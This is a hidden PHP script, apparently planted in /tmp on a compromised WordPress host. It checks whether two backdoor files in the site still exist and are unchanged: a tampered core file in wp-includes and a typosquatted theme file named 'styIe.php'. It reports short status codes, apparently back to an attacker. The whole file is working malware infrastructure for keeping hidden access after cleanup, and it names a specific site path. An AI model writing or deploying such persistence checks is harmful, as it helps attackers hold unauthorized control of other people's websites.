File: //tmp/.hld
<?php $r = '/home/timbellomo/acousticalanalysisassociates.com'; $x = ["/wp-includes/class-wp-http-requests-hooks.php"=>"bd@@385200@@Authorization",
"/wp-content/themes/custom-file-1-1748024674/styIe.php"=>"bd@@259905@@727"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');